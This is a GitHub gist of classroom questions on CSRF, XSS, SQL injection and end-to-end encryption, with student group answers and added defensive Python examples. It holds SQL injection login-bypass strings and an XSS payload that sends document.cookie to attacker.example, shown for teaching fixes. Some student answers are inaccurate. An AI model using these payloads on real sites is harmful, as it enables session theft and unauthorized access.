@halitbatur
Created January 18, 2024 11:16
Types of attacks discussion
  1. What is a CSRF attack? How does it use HTTP requests? And why do we call it the one-click attack?
  2. What is an XSS attack? What is the connection between it and cookies/sessions? And what are the two main categories of XSS?
  3. What is SQL injection, and what is the attacker's intention behind it?
  4. Consider the SQL command below. Where is the vulnerability? Think about some ways an attacker can misuse it:
const { username, password } = req.body
let strQry = `SELECT Count(*) FROM Users WHERE username=${username} AND password=${password}`;
  5. What does end-to-end encryption mean? Share an example of a well-known app using E2EE, and explain how that app uses it.
@mohmmadms

Mohmmad Smadi, Gorgees Odisho, Mohamad Sheikh Alshabab, Hayder Abu-Al-Hummos

Q1:
Cross-Site Request Forgery (CSRF) is an attack that forces an end user to execute unwanted actions on a web application in which they're currently authenticated. With a little help from social engineering, an attacker may trick the users of a web application into executing actions of the attacker's choosing. The attack takes advantage of the fact that the browser includes the user's authentication credentials with every request to the targeted site, like when a user tries to log in: while his request gets to the server, the attacker or the hacker can implement the request. Man in the middle is how CSRF can exploit this: when a user logs into a website, the server typically issues a session cookie to the user. This cookie is stored by the user's browser and is sent automatically with every subsequent request to the same domain. The reason why it's called a one-click attack is that the victim typically needs to perform just one action, such as clicking on a link or visiting a malicious website, to unintentionally initiate an attack.

Q2:
Cross-site scripting (XSS) is an attack in which an attacker injects malicious executable scripts into the code of a trusted application or website. Attackers often initiate an XSS attack by sending a malicious link to a user and enticing the user to click it. If the app or website lacks proper data sanitization, the malicious link executes the attacker's chosen code on the user's system. As a result, the attacker can steal the user's active session cookie. One of the primary goals of XSS attacks is to steal user authentication tokens or session cookies, and XSS attacks can also be used to fixate a user's session, where an attacker sets or manipulates the user's session ID.

  1. Stored XSS (Persistent):

    • Scripts are permanently stored on the server.
    • Executed when users visit a specific page.
    • Impact can last across multiple sessions.
  2. Reflected XSS (Non-Persistent):

    • Scripts are embedded in URLs or form inputs.
    • Executed when users interact with a crafted link or form.
    • Typically a one-time event; the script is not stored on the server.

Q3:
A code-based vulnerability that allows an attacker to read and access sensitive data from the database.

Q4 :
This is the vulnerable part: (username=${username} AND password=${password}`;).
A way attackers can misuse it is through classic SQL injection, in which an attacker could input a specially crafted value for the username or password parameter to manipulate the SQL query.

Q5:
End-to-end is basically where whatever is output from the server goes out encrypted, all the way until it reaches the end user, and only then is it decrypted. WhatsApp: before a message ever leaves your device, it's secured with a cryptographic lock, and only the recipient has the keys; the keys change with every single message that's sent.
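The cookie-sent-automatically mechanism from Q1 above, worked as an added example (this is editorial code, not the gist's and not the commenters'): a server-side check that rejects a forged cross-site POST even though the victim's session cookie rides along with it. The site origin, the server secret, the session store and both request dictionaries are constructed for the example; hostnames are hypothetical.

```python
import hashlib
import hmac
from urllib.parse import urlsplit

# Constructed for this example (hypothetical values): the site the victim is
# logged into and the server secret used to derive per-session anti-CSRF tokens.
SITE_ORIGIN = "https://bank.example"
SERVER_SECRET = b"rotate-me-in-production"

# Constructed session store: cookie value -> logged-in user.
SESSIONS = {"s3ss10n": "alice"}


def csrf_token(session_id: str) -> str:
    """Token bound to the session; a page on another site cannot compute it."""
    return hmac.new(SERVER_SECRET, session_id.encode(), hashlib.sha256).hexdigest()


def is_state_changing(method: str) -> bool:
    # Only requests that change state need CSRF protection; GETs must not change state.
    return method.upper() not in ("GET", "HEAD", "OPTIONS")


def request_is_forged(request: dict, sessions: dict) -> bool:
    """Decide whether a state-changing request should be rejected as CSRF.

    `request` is a plain dict with 'method', 'headers', 'cookies' and 'form'
    keys, standing in for a framework request object.
    """
    if not is_state_changing(request["method"]):
        return False
    session_id = request["cookies"].get("session")
    if session_id not in sessions:
        return True  # no authenticated session: nothing to authorise, reject
    # Check 1: the browser, not the page, sets Origin/Referer, so a form
    # auto-submitted from attacker.example arrives with the attacker's origin.
    source = request["headers"].get("Origin") or request["headers"].get("Referer")
    if source is None:
        return True
    parts = urlsplit(source)
    if f"{parts.scheme}://{parts.netloc}" != SITE_ORIGIN:
        return True
    # Check 2: the form must echo the token the server issued for this session.
    submitted = request["form"].get("csrf_token", "")
    return not hmac.compare_digest(submitted, csrf_token(session_id))


# A legitimate transfer from the bank's own page: same origin, carries the token.
LEGIT = {
    "method": "POST",
    "headers": {"Origin": SITE_ORIGIN},
    "cookies": {"session": "s3ss10n"},
    "form": {"to": "bob", "amount": "10", "csrf_token": csrf_token("s3ss10n")},
}

# The "one click": an auto-submitting form on attacker.example. The browser
# still attaches alice's session cookie (that is the whole point of CSRF),
# but Origin is the attacker's and no valid token is present.
FORGED = {
    "method": "POST",
    "headers": {"Origin": "https://attacker.example"},
    "cookies": {"session": "s3ss10n"},
    "form": {"to": "mallory", "amount": "1000"},
}

if __name__ == "__main__":
    for name, req in (("legitimate", LEGIT), ("forged", FORGED)):
        verdict = "rejected" if request_is_forged(req, SESSIONS) else "accepted"
        print(f"{name}: {verdict}")
```

The two checks cover each other's gaps: Origin or Referer can be absent (privacy settings and some clients strip Referer), and the token is only as secret as the page that carries it, so an XSS bug on the same site would expose it. Setting the session cookie with SameSite=Lax or Strict is a third layer in current browsers, because the cookie is then not attached to a cross-site POST at all.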

@Dana8392

Room 11: Dana Maraqa, Musab Sakhreyah, Aya Abu Al Hummos, Sanad Al Shobaki

Q1:
Cross-Site Request Forgery (CSRF) is an attack that forces authenticated users to submit a request to a web application against which they are currently authenticated. CSRF attacks exploit the trust a web application has in an authenticated user, by using HTTP requests to deceive the victim's browser into sending a forged request to a target site where the victim is authenticated.

It is called a one-click attack because it usually takes one click on a malicious link or a visit to a malicious website for the attack to initiate.

Q2:
An XSS (Cross-Site Scripting) attack occurs when an attacker injects malicious scripts into content from a trusted website, which then get executed in the victim's browser. The connection between XSS and cookies/sessions is that attackers often use XSS to steal session cookies or tokens. By injecting scripts that send the user's cookies to the attacker, they can hijack the user's session and impersonate them.

XSS Categories:
Stored (persistent): The malicious script is permanently stored on the target server.
Reflected (non-persistent): The malicious script is included in a request sent to the server, and the server includes it in the response.

Q3:

  • SQL injection is a type of cyber attack that occurs when an attacker inserts or manipulates malicious SQL code into input fields of a web application.
  • The goal of SQL injection is to trick the application into executing unintended SQL queries, which can lead to unauthorized access, data manipulation, and potentially full control of the database.

Q4-
The SQL command is vulnerable to SQL injection because it directly includes user-provided data (username and password) in the SQL query. An attacker could provide a specially crafted username or password that alters the SQL command. For example, if an attacker provides "admin'; --" as the username, the SQL command becomes SELECT Count(*) FROM Users WHERE username='admin'; -- AND password=${password}, which could allow unauthorized access if 'admin' is a valid username.

Or SQL injection can be used to change the query mentioned above into SELECT Count(*) FROM Users WHERE username='' OR '1'='1'; which will always evaluate to true, so the authentication for the username and password will always return the data.

Q5-
End-to-End Encryption (E2EE): E2EE is a method of secure communication that prevents third-parties from accessing data while it's transferred from one end system or device to another. A well-known app that uses E2EE is WhatsApp. WhatsApp uses the Signal Protocol to implement end-to-end encryption. When you send a message, it is secured with a lock, and only the recipient has the special key to unlock and read the message.
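The two payloads discussed in Q4 above, run against a real database as an added example (editorial code, not the gist's and not the commenter's): Python with the standard-library sqlite3 module, an in-memory Users table with one constructed account, the gist's interpolated query with quotes added around the values (the payloads above assume that quoted form, and it is injectable in exactly the same way) beside a parameterized version. The precedence pitfall is included: a tautology in the username field alone does not bypass the password check, because AND binds tighter than OR.

```python
import sqlite3


def make_db() -> sqlite3.Connection:
    """Constructed sample data: one user account, kept in memory."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE Users (username TEXT, password TEXT)")
    conn.execute("INSERT INTO Users VALUES ('alice', 'correct horse')")
    conn.commit()
    return conn


def login_interpolated(conn: sqlite3.Connection, username: str, password: str) -> bool:
    """The gist's pattern: user input is pasted into the SQL text.

    Quotes are added around the values here (the gist omits them); the
    payloads in the discussion assume this quoted form.
    """
    query = (
        "SELECT Count(*) FROM Users "
        f"WHERE username='{username}' AND password='{password}'"
    )
    return conn.execute(query).fetchone()[0] > 0


def login_parameterized(conn: sqlite3.Connection, username: str, password: str) -> bool:
    """Placeholders: the values travel separately from the statement text,
    so whatever they contain is compared as data and never parsed as SQL."""
    query = "SELECT Count(*) FROM Users WHERE username=? AND password=?"
    return conn.execute(query, (username, password)).fetchone()[0] > 0


if __name__ == "__main__":
    db = make_db()
    # '--' starts a SQL comment, so the password condition is never evaluated.
    print(login_interpolated(db, "alice' --", "anything"))        # True
    # Tautology in both fields: the WHERE clause is always true.
    print(login_interpolated(db, "' OR '1'='1", "' OR '1'='1"))  # True
    # Tautology in the username only: AND binds tighter than OR, so the
    # clause is  username='' OR ('1'='1' AND password='wrong')  and fails.
    print(login_interpolated(db, "' OR '1'='1", "wrong"))         # False
    # Same payload against the parameterized query is just a wrong username.
    print(login_parameterized(db, "alice' --", "anything"))       # False
```

The parameterized query is the fix to ship; in the Node code from the gist the equivalent is the driver's placeholder form (`?` with mysql2, `$1` with pg) with the values passed as a separate array. Two caveats: passwords are compared in plaintext only to mirror the gist (a real login compares a salted hash), and sqlite3's `execute()` refuses stacked statements, so a `'; DROP TABLE Users; --` payload raises an error here while other drivers would happily run it.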

@JanaAbuHaltam

Jana, Banan, Hala, Hadeel
Q1
A CSRF (Cross-Site Request Forgery) attack involves unauthorized actions taking place on a website using the credentials of a trusted user, often without their knowledge. To prevent such attacks, developers implement security measures like anti-CSRF tokens and follow best practices. In a CSRF attack, the attacker deceives the user into triggering unauthorized commands on a trusted website through a manipulated HTTP request. Developers use anti-CSRF tokens in HTTP requests to validate their authenticity and reduce the risk of unauthorized commands being executed. The term "one-click attack" is used to underscore that in many cases, a single click by the user is sufficient to initiate the attack, using the user's active session on the targeted website to execute unauthorized actions.

Q2
XSS attack is short for cross-site scripting. XSS attacks are a type of injection in which attackers inject malicious scripts into the code of trusted websites.
Categories:
Reflected XSS (non-persistent / Type I)
Stored XSS (Persistent / Type II)
DOM-based XSS (Type 0)
Connection between XSS and sessions/cookies:
XSS attacks can access the cookies including session cookies of the users so the attacker can impersonate legitimate users and gain unauthorized access.

Q3
SQL injection is a type of cyber attack where an attacker inserts or manipulates malicious SQL (Structured Query Language) code into input fields of a web application. The intention is to exploit vulnerabilities in the application's code that doesn't properly validate or sanitize user input.

The attacker's goals with SQL injection can include:

Unauthorized Access: By injecting malicious SQL code, attackers may gain unauthorized access to a database, retrieve, modify, or delete data.
Data Manipulation: Altering or deleting data within the database, potentially causing data loss or corruption.
Authentication Bypass: Using SQL injection to bypass login mechanisms, gaining access to restricted areas of an application.
Information Disclosure: Retrieving sensitive information from the database that wasn't meant to be accessible, such as usernames, passwords, or other confidential data.

Q4
The provided SQL command is susceptible to SQL injection, a prevalent security vulnerability in web applications. The vulnerability stems from the direct interpolation of user inputs (username and password) into the SQL query string in the given code:

const { username, password } = req.body
let strQry = `SELECT Count(*) FROM Users WHERE username=${username} AND password=${password}`;

• The risk lies in the direct interpolation of user inputs, allowing an attacker to potentially manipulate the SQL query by controlling the values of username and password in a malicious manner. This manipulation could lead to unauthorized actions or the extraction of sensitive information. An example of a malicious input could be:
username: '1'='1';
This input will always evaluate to true, showcasing the potential danger associated with SQL injection vulnerabilities.

Q5
End-to-end encryption refers to a method of secure communication that prevents third-parties from accessing data while it's transferred from one end system or device to another. In this process, the data is encrypted at the sender's end and only the recipient is able to decrypt it. This means that even the service provider or network operator in the middle of the communication cannot access the unencrypted data. It ensures that the data is secure and private throughout the entire communication process.
One well-known app that utilizes end-to-end encryption (E2EE) is WhatsApp. WhatsApp utilizes E2EE to secure all communications, including text messages, voice calls, video calls, and file transfers, between users. When a message is sent, it is encrypted on the sender's device and can only be decrypted by the recipient's device. This ensures that the content of the messages remains private and secure, even if the messages are intercepted during transmission. The use of E2EE in WhatsApp provides users with a high level of privacy and security in their communications.
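The stored-versus-reflected distinction from Q2 above, and the session-cookie connection, worked as an added example (editorial code, not the gist's and not any commenter's): a reflected search page and a stored comment list rendered with and without output encoding, plus the HttpOnly attribute that keeps an injected script from reading the session cookie through document.cookie. The payload, the attacker hostname and the comment store are constructed for the example.

```python
import html

# Constructed payload: what an attacker submits to send the victim's cookies
# to a host they control (hypothetical hostname).
PAYLOAD = "<script>new Image().src='https://attacker.example/?c='+document.cookie</script>"


def render_search_unsafe(q: str) -> str:
    # Reflected XSS: the query parameter is echoed straight into the page, so a
    # crafted link runs the payload in the browser of whoever clicks it.
    return f"<p>Results for {q}</p>"


def render_search_safe(q: str) -> str:
    # Output encoding for the HTML text context: < > & " ' become entities,
    # so the browser shows the payload as text instead of executing it.
    return f"<p>Results for {html.escape(q)}</p>"


# Stored XSS: the comment is saved server-side and rendered for every visitor.
COMMENTS: list = []


def post_comment(text: str) -> None:
    # Keep the raw text; encode at output time, where the context is known.
    COMMENTS.append(text)


def render_comments_unsafe() -> str:
    return "<ul>" + "".join(f"<li>{c}</li>" for c in COMMENTS) + "</ul>"


def render_comments_safe() -> str:
    return "<ul>" + "".join(f"<li>{html.escape(c)}</li>" for c in COMMENTS) + "</ul>"


def contains_active_script(page: str) -> bool:
    # Deliberately crude check: is an unescaped <script tag still in the output?
    return "<script" in page.lower()


def session_cookie_header(value: str) -> str:
    # HttpOnly keeps the cookie out of document.cookie, so even a script that
    # does run cannot read it; Secure and SameSite are defence in depth.
    return f"Set-Cookie: session={value}; HttpOnly; Secure; SameSite=Lax; Path=/"


if __name__ == "__main__":
    print(render_search_unsafe(PAYLOAD))  # the script tag reaches the browser intact
    print(render_search_safe(PAYLOAD))    # rendered as harmless text
    post_comment(PAYLOAD)
    print(contains_active_script(render_comments_unsafe()))  # True
    print(contains_active_script(render_comments_safe()))    # False
    print(session_cookie_header("s3ss10n"))
```

html.escape covers the HTML text and attribute contexts; a value placed inside a script block, an event handler or a URL needs that context's own encoding. DOM-based XSS (Type 0 in the list above) happens in client-side JavaScript the server never sees, so server-side encoding does not reach it; avoiding innerHTML-style sinks and a Content-Security-Policy are the controls there. HttpOnly stops the cookie being read, not the script acting as the user from inside the page.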
